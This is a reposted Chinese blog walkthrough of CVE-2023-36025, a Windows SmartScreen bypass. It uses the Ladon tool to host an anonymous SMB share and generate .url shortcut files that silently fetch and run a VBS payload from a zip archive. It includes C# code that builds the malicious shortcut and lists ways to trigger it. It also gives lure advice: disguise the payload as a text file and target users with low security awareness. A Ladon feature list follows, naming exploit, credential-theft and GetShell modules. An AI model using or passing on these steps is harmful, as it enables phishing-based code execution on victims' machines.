全版本Windows RCE漏洞复现CVE-2023-36025

渗透技巧 10个月前 admin
207 0 0

漏洞补丁已出3个月,URL格式,对于有点安全意识的人来说,几乎不会点,加上补丁,成功率会很低,所以仅为复现学习,使用者后果自负。

漏洞简介

    CVE-2023-36025是微软于11月补丁日发布的安全更新中修复Windows SmartScreen安全功能绕过漏洞。攻击者可以通过诱导用户单击特制的URL来利用该漏洞,对目标系统进行攻击。成功利用该漏洞的攻击者能够绕过Windows Defender SmartScreen检查及其相关提示。该漏洞的攻击复杂性较低,可创建并诱导用户点击恶意设计的 Internet 快捷方式文件 (.URL) 或指向此类文件的超链接来利用该漏洞,无需特殊权限即可通过互联网进行利用。


影响范围

Win7Win10Win11Win2008Win2012Win2016Win2019Win2022
从影响版本上看,确实牛B,但从触发或文件格式上看,可能不占优势。
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2023-36025


漏洞复现

条件:

1.目标能访问到SMB共享(VPS外网或内网架设都可以)2.需用户点击POC文件(自己想办法)

一、开启SMB服务器

关闭系统SMB服务,不让445端口占用,使用CloseSMB模块,重启生效,当然也可以不关闭,直接使用系统的开启SMB共享,因为这洞和Win11主题RCE不一样,不需要特制SMB共享。

关闭SMB

Ladon CloseSMB

PS: 彻底关闭445端口,SMB相关服务,重启生效,可防止SMB漏洞或新出0day攻击,在VPS上使用一键程序会比开启系统SMB要安全很多,除非别人挖Ladon的SMB服务器漏洞,且用完就关,很安全。

一键开启SMB匿名共享

Ladon SmbServer

全版本Windows RCE漏洞复现CVE-2023-36025

资源管理器访问\192.168.50.165test,看到共享即为成功

二、 程序同根目录下放share目录

share目录里放一个test.zip文件,test.zip压缩test.vbs文件,test.vbs内容为自己的内容,样例为弹框。通过共享访问,应该看到share里面的内容,共享名称为test

全版本Windows RCE漏洞复现CVE-2023-36025

直接双击vbs、exe、bat等有“安全警告” ,点打开后才执行

全版本Windows RCE漏洞复现CVE-2023-36025

打开zip文件,也会有提示(在win7下,其它系统zip好像直接目录浏览)

全版本Windows RCE漏洞复现CVE-2023-36025

三、生成url文件poc

支持IP、URL、UNC以及file完整路径格式,填写IP默认POC请求指向test目录下test.zip/test.vbs文件

Ladon GenURL 192.168.188.2
Ladon GenURL http://192.168.188.2
Ladon GenURL \192.168.50.189testLadon GenURL \192.168.188.2Ladon GenURL \192.168.188.2
Ladon GenURL file://192.168.188.2/test/test.zip/test.vbsLadon GenURL file://192.168.188.2/testLadon GenURL file://192.168.188.2/
正常的URL文件,可能是系统自带的url快捷方式图标,如果IE或Firefox等浏览器关联,那么就显示成对应浏览器的图标。

全版本Windows RCE漏洞复现CVE-2023-36025全版本Windows RCE漏洞复现CVE-2023-36025
Ladon生成的URL图标如下,具有一定迷惑性,双击test.txt,无任何提示,直接执行VBS脚本。

全版本Windows RCE漏洞复现CVE-2023-36025

测试win11也是一样,直接执行

全版本Windows RCE漏洞复现CVE-2023-36025

通过Ladon控制台可以看到Win7和Win11都访问了我们的SMB,查看SmbServer.log日志,可看到访问了test.zip文件,若是实战,可用于确认目标是否点击,如果是其它漏洞,我们也可以确认目标是否触发,如域打印机提权,DLL也需要SMB共享,上次win11的RCE也是一样。

全版本Windows RCE漏洞复现CVE-2023-36025


URL文件生成代码
using System;using System.IO;
class Program{ static void Main(string[] args) { if (args.Length < 1) { Console.WriteLine("ip"); return; }
string ip = args[0]; string url = "file://" + ip + "/test/test.zip/test.vbs"; string content = "[InternetShortcut]nURL=" + url + "nIDList=n";
File.WriteAllText("test.url", content); }}

触发方式

1.直接打开或双击poc文件会触发
2.zip、rar、7z等压缩包里双击poc也会触发
3.解压后,打开或双击poc文件会触发(就是1)

全版本Windows RCE漏洞复现CVE-2023-36025

解压后,使用Ladon生成的文件,不是互联网图标。

全版本Windows RCE漏洞复现CVE-2023-36025


对VBS进行修改,将其伪装成打开TXT(再执行代码),更具迷惑性。

全版本Windows RCE漏洞复现CVE-2023-36025
使用Ladon生成的URL文件,解压出来看上去像TXT,不注意的人就会点

PS:尝试伪装成任意图标,不管是全路径还是URL,均失败

小结

漏洞补丁已发布3个月,即使杀软或EDR不拦截也不一定能触发,发的是URL文件,不是DOC、PDF、Excel这种正常文档文件,别人点击的概率低。当然如果你的文案好,或组合其它漏洞链接到url文件,再加上一点运气,可能不会空军。有些附件只允许ZIP、RAR文档,想诱导人点URL文件可能更难,但这个绕过技巧,还是值得学习,或许组合其它漏洞可以发挥更大作用。

系统漏洞和office漏洞不一样,出补丁,系统更新或杀软也会补上,但是office用户不打补丁,杀软也不是针对漏洞点拦截,旧洞只要做好免杀,就能用,所以不能一概而论,此漏洞对有点安全意识的人可能没用,因为至少它们知道不熟悉的后缀不要点,但对于没有安全意识的,看图标无害,杀软也不杀,他们就点了,所以成功率高不高,取决于目标,如果确定目标意识差,可以尝试。



Ladon简介

  Ladon单兵作战综合工具、模块化网络渗透工具,可PowerShell模块化、可CS插件化、可内存加载,无文件扫描。含端口扫描、服务识别、网络资产探测、密码审计、高危漏洞检测、漏洞利用、密码读取以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描等。12.4版本内置265个功能模块,外部模块18个,网络资产探测模块30个通过多种协议(ICMPNBTDNSMACSMBWMISSHHTTPHTTPSExchangemssqlFTPRDP)以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、交换机、数据库、打印机等信息,高危漏洞检测16个包含Cisco、Zimbra、Exchange、DrayTek、MS17010、SMBGhost、Weblogic、ActiveMQ、Tomcat、Struts2系列、Printer等,密码审计23个含数据库(Mysql、Oracle、MSSQL)、FTP、SSH、VNC、Windows(LDAP、SMB/IPC、NBT、WMI、SmbHash、WmiHash、Winrm)、BasicAuth、Tomcat、Weblogic、Rar等,远程执行命令包含(smbexec/wmiexe/psexec/atexec/sshexec/webshell),Web指纹识别模块可识别135+(Web应用、中间件、脚本类型、页面类型)等,本地提权21+含SweetPotatoBadPotatoEfsPotatoBypassUAC,可高度自定义插件POC支持.NET程序集、DLL(C#/Delphi/VC)、PowerShell等语言编写的插件,支持通过配置INI批量调用任意外部程序或命令,EXP生成器可一键生成漏洞POC快速扩展扫描能力。Ladon支持Cobalt Strike插件化扫描快速拓展内网进行横向移动 内网渗透。

   Ladon早期功能只是内网渗透扫描器,所以大家误以为Ladon只是内网渗透工具,随着版本更迭,这2年不管是外网渗透、内网渗透、Web渗透还是后渗透,如前渗透,使用相关搜索引擎导出探测好的IP或URL,即可直接用Ladon批量利用新出漏洞获取大量权限。后渗透拿到权限后,不管是操作系统提权、数据库提权,或是横向执行命令、域渗透模块等,各种功能应有尽有,一个工具解决大量问题,所以定义单兵综合作战工具

Ladon 12.4

Ladon 12.4  20240108[u]SmbServer  支持Smb v1 v2 v3协议[u]HtaServer  支持自定义端口[+]GenURL    生成url文件(Windows RCE CVE-2023-36025或其它漏洞)[u]SslInfo    输出SslInfo.log日志[+]SmbServer  修复写日志崩溃的Bug,日志文件为SmbServer.log

12.28[u]SslInfo 输出SslInfo.txt日志,解决一些语言乱码问题[u]cmddll 修复Win7/Win8下GUI生成DLL的问题
12.3 20231221[+]SmbServer 一键SMB共享服务器,记录来访IP,访问资源等[+]Win11ThemeRce CVE-2023-38146 Win11主题远程执行Exploit

12.15[+]OracleCmd2 Oracle数据库远程提权工具2 官方驱动>=net 4.8 大小4.9M不内置
Ladon 12.2 12.14[+]OracleCmd Oracle数据库远程提权工具 3种方法一键提权 支持Windows/Linux/MacOS等服务器操作系统 支持高版本Oracle 12G、11G、12G及之前版本[+]FindAD PVEFindADUser可用于查找活动目录用户登陆的位置、枚举域用户
Ladon 12.1 12.08[+]LotusAdmin 检测用户是否Lotus管理员[+]HtaSer Hta服务器(不限后缀,如访问doc执行hta)[+]ConfVer ConfluenceVer探测Confluence版本
Ladon 12.0 20231201[+]DomainLog DomainUserIP 远程查询 域用户、IP[u]LoginLog 4624成功日志 域用户、域名、登陆IP /all 导出全部日志 原始数据LoginLog 用户名 LoginLog 用户名 记录数
==========================================================Ladon 11.9 20231105[u]LadonStudy 支持bypassEDR[u]LadonShell 支持tls 1.2[u]RdpInfo 优化RDP Ntlm探测系统信息[u]RdpLog 查看3389连接日志(IP、用户名、CertHash)[+]CVE-2023-46604 ActiveMQ CVE-2023-46604 RCE Exploit
Ladon 11.8 20231018[u]InfoScan 新增SmtpInfo[+]SmtpInfo 新增Smtp Ntlm探测系统信息(25465587端口)[u]InfoScan 新增HttpInfo[+]HttpInfo 新增Http/Https Ntlm探测系统信息(SharePoint)





原文始发于微信公众号(K8实验室):全版本Windows RCE漏洞复现CVE-2023-36025

版权声明:admin 发表于 2024年1月10日 上午12:39。
转载请注明:全版本Windows RCE漏洞复现CVE-2023-36025 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...